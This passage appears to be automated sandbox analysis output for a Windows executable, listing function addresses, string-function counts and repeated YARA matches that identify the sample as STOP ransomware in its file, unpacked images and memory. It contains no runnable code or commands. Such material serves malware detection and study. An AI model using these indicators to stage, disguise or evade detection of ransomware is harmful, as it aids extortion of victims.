              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00EF93434_2_00EF9343
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E644FF4_2_00E644FF
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E384C04_2_00E384C0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E354474_2_00E35447
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E354574_2_00E35457
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E7B5B14_2_00E7B5B1
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E795064_2_00E79506
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E396864_2_00E39686
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E4E6904_2_00E4E690
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3A6604_2_00E3A660
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E7D7A14_2_00E7D7A1
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E387804_2_00E38780
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E367404_2_00E36740
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E327504_2_00E32750
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3F7304_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3A7104_2_00E3A710
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E368804_2_00E36880
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E5C8044_2_00E5C804
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E369F34_2_00E369F3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E7D9DC4_2_00E7D9DC
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00EB19204_2_00EB1920
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E79A714_2_00E79A71
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E32B804_2_00E32B80
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E36B804_2_00E36B80
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E73B404_2_00E73B40
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E7ACFF4_2_00E7ACFF
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E39CF94_2_00E39CF9
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E39DFA4_2_00E39DFA
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3BDC04_2_00E3BDC0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E57D6C4_2_00E57D6C
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E3DD404_2_00E3DD40
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E36EE04_2_00E36EE0
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E5CE514_2_00E5CE51
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E79FE34_2_00E79FE3
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E39F764_2_00E39F76
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: 4_2_00E50F304_2_00E50F30
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 0048F7C0 appears 129 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00485007 appears 32 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00488520 appears 136 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00482587 appears 48 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004A1A25 appears 44 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004AF26C appears 41 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00488C81 appears 74 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B4E50 appears 62 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B0870 appears 52 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004B47A0 appears 64 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00480EC2 appears 40 times
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 004AF23E appears 108 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E52587 appears 48 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E7F26C appears 41 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E71A25 appears 44 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E5F7C0 appears 129 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E50EC2 appears 40 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E847A0 appears 64 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E58520 appears 136 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E84E50 appears 62 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E80870 appears 52 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E58C81 appears 74 times
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeCode function: String function: 00E7F23E appears 108 times
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, type: SAMPLEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 4.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 4.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.0.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.460000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.2.3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe.e30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000000.1671969796.0000000000E31000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1664627925.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2913987224.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000006.00000002.1839557804.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1664775238.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000000.1672060797.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1646178008.000000000052C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000004.00000002.1757349681.0000000000EFC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
